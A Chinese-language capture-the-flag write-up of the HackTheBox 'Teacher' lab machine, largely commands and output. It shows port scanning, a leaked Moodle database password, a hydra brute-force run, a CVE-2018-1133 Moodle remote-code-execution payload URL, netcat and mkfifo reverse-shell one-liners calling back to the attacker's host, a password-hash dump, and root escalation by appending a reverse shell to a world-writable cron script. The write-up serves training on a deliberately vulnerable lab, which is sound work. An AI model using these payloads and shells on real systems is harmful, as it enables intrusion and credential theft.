title: HackTheBox-Teacher author: Crazyinside layout: true categories: HackTheBox tags:
-
• LInux
先介绍一个估计也困扰很多同僚好久但无法解决问题的一个解决方案,这技巧也是我最近才从某位师傅口中了解得知。就是在每次获取的VPN文件中添加一行自己的代理地址.
socks-proxy 127.0.0.1 7890
网络环境会有明显的改观。
我抛弃Windows已经很久了,现在应该算是一个标准的linux用户,记录靶机WP一方面是为了锻炼自身的熟练度,二方面是为了填充博客空虚的文章空间,三是为了配合相关的学习计划,以及无形之中培养的文档写作能力。用了段时间linux发现是真的香:
介于网络环境延迟虽然还是会有些许波动,但是大体环境还是挺稳定的:
Crazy:~/HackTheBox$ ping 10.10.10.153
PING 10.10.10.153 (10.10.10.153) 56(84) bytes of data.
64 bytes from 10.10.10.153: icmp_seq=1 ttl=63 time=103 ms
64 bytes from 10.10.10.153: icmp_seq=2 ttl=63 time=149 ms
64 bytes from 10.10.10.153: icmp_seq=3 ttl=63 time=272 ms
64 bytes from 10.10.10.153: icmp_seq=4 ttl=63 time=99.1 ms
64 bytes from 10.10.10.153: icmp_seq=5 ttl=63 time=114 ms
64 bytes from 10.10.10.153: icmp_seq=6 ttl=63 time=99.4 ms
64 bytes from 10.10.10.153: icmp_seq=7 ttl=63 time=96.3 ms可以masscan进行扫描,漏扫的情况会少很多:
Crazy:~/Teacher$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.153
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-21 11:17:16 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.153 
默认页面是一个特别假的页面,很多按钮是都无法与之交互的。基本信息也是没有什么的:
Crazy:~/HackTheBox$ curl -I http://teacher.htb/
HTTP/1.1 200 OK
Date: Sun, 21 Aug 2022 11:35:10 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Wed, 27 Jun 2018 02:53:22 GMT
ETag: "1f5c-56f96b7bed26f"
Accept-Ranges: bytes
Content-Length: 8028
Vary: Accept-Encoding
Content-Type: text/html然后我用了一款新工具skipfish对目录进行枚举,中途感觉爬的差不多可以手动ctrl C 停止,该工具会将结果转换为可视化的html页面:
它有将一张5.png的图片当成一个文本。我也觉得有趣,但是这图片是访问不了的:
可能本身就是一个txt文件:
Crazy:~/HackTheBox$ wget http://teacher.htb/images/5.png
--2022-08-21 19:45:49-- http://teacher.htb/images/5.png
正在解析主机 teacher.htb (teacher.htb)... 10.10.10.153
正在连接 teacher.htb (teacher.htb)|10.10.10.153|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:200 [image/png]
正在保存至: “5.png.1”
5.png.1 100%[===================================================================================================================================================================>] 200 --.-KB/s 用时 0s
2022-08-21 19:45:49 (12.6 MB/s) - 已保存 “5.png.1” [200/200])
Crazy:~/HackTheBox$ cat 5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni一个用户名:Giovanni。一个密码字符串:Th4C00lTheacha,没有最后一位。紧接着还有一个 moodle 目录。应该是靶机的主题:
这个目录还伴随着大量的目录遍历文件泄露:
Crazy:~/HackTheBox$ curl http://teacher.htb/moodle/config.php.save
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'root';
$CFG->dbpass = 'Welkom1!';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://10.10.10.153/moodle'; // CHANGE THIS - Gi$CFG->dataroot = '/var/www/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
登录框可以根据用户名Giovanni去尝试爆破,因为他自己说了他只是忘了最后一位:Th4C00lTheacha,可以用python快速生成,或者burp都行:
python3 -c 'import string;print("n".join([f"Th4C00lTheacha{c}" for c in string.printable[:-5]]))' > passwordsCrazy:~/HackTheBox$ hydra -l Giovanni -P passwords 10.10.10.153 http-post-form "/moodle/login/index.php:anchor=&username=^USER^&password=^PASS^&rememberusername=1:Invalid login"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-21 19:56:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 95 login tries (l:1/p:95), ~6 tries per task
[DATA] attacking http-post-form://10.10.10.153:80/moodle/login/index.php:anchor=&username=^USER^&password=^PASS^&rememberusername=1:Invalid login
[80][http-post-form] host: 10.10.10.153 login: Giovanni password: Th4C00lTheacha#
1 of 1 target successfully completed, 16 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-21 19:56:38这WEB应用确实有个RCE的漏洞,利用倒是不难,但是可难找了,
http://teacher.htb/moodle/question/question.php?courseid=2&sesskey=DOqbmippKA&qtype=calculated&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&cmid=7&category=2&addonpage=0&appendqnumstring=addquestion
漏洞的地方是在这里,漏洞编号为CVE-2018-1133,具体漏洞细节我就不复制粘贴了:
https://blog.sonarsource.com/moodle-remote-code-execution/?redirect=ripspayload会因为后台错误交接直接演变为一个WebShell:
http://teacher.htb/moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=7&wizardnow=datasetitems&cmid=7&0=ping%20-c%201%2010.10.16.3Crazy:~/HackTheBox$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
20:06:48.989982 IP teacher.htb > 10.10.16.3: ICMP echo request, id 3291, seq 1, length 64
20:06:48.990014 IP 10.10.16.3 > teacher.htb: ICMP echo reply, id 3291, seq 1, length 64
20:06:49.088302 IP teacher.htb > 10.10.16.3: ICMP echo request, id 3293, seq 1, length 64
20:06:49.088321 IP 10.10.16.3 > teacher.htb: ICMP echo reply, id 3293, seq 1, length 64编码反弹shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.3 1337 >/tmp/f
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.16.3%201337%20%3E%2Ftmp%2FfCrazy:~/HackTheBox$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.153] 54248
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$ ls
ls
addquestion.php engine move_form.php toggleflag.php
behaviour export.php preview.php type
category.php export_form.php previewlib.php upgrade.php
category_class.php flags.js qengine.js upgrade.txt
category_form.php format question.php yui
classes format.php renderer.php
edit.php import.php templates
editlib.php import_form.php tests
www-data@teacher:/var/www/html/moodle/question$ 刚刚是有拿到数据库泄露密码的,在moodle表里会有其他账号信息:
MariaDB [moodle]> select username,password from mdl_user;
select username,password from mdl_user;
+-------------+--------------------------------------------------------------+
| username | password |
+-------------+--------------------------------------------------------------+
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)最后一个是可以破解出来了的:
MariaDB [moodle]> exit
exit
Bye
www-data@teacher:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle/question$ ls
ls
addquestion.php engine move_form.php toggleflag.php
behaviour export_form.php previewlib.php type
category_class.php export.php preview.php upgrade.php
category_form.php flags.js qengine.js upgrade.txt
category.php format question.php yui
classes format.php renderer.php
editlib.php import_form.php templates
edit.php import.php tests
giovanni@teacher:/var/www/html/moodle/question$ cd ~
cd ~
giovanni@teacher:~$ ls
ls
user.txt work
giovanni@teacher:~$ cat user.txt
cat user.txt
2ad1e90bef00ffafee595084962b4111giovanni@teacher:~/work/tmp$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
giovanni@teacher:~/work/tmp$ ls -l /usr/bin/backup.sh
ls -l /usr/bin/backup.sh
-rwxrwxrwx 1 root root 138 Jun 27 2018 /usr/bin/backup.sh
giovanni@teacher:~/work/tmp$ ln -s /usr/bin/backup.sh
ln -s /usr/bin/backup.sh
giovanni@teacher:~/work/tmp$ ls
ls
backup_courses.tar.gz backup.sh courses
giovanni@teacher:~/work/tmp$ cat backup.sh
cat backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
giovanni@teacher:~/work/tmp$ ls -all
ls -all
total 16
drwxr-xr-x 3 giovanni giovanni 4096 Aug 21 14:19 .
drwxr-xr-x 4 giovanni giovanni 4096 Mar 21 15:29 ..
-rwxrwxrwx 1 root root 259 Aug 21 14:20 backup_courses.tar.gz
lrwxrwxrwx 1 giovanni giovanni 18 Aug 21 14:19 backup.sh -> /usr/bin/backup.sh
drwxrwxrwx 3 root root 4096 Mar 21 15:29 courses
giovanni@teacher:~/work/tmp$ echo "nc -e /bin/bash 10.10.16.3 443" >> /usr/bin/backup.sh < -e /bin/bash 10.10.16.3 443" >> /usr/bin/backup.sh
giovanni@teacher:~/work/tmp$ cat /usr/bin/backup.sh
cat /usr/bin/backup.sh
#!/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;
nc -e /bin/bash 10.10.16.3 443
giovanni@teacher:~/work/tmp$ Crazy:~/HackTheBox$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.153] 40502
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
8b1..............................原文始发于微信公众号(老鑫安全):HackTheBox-Teacher
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论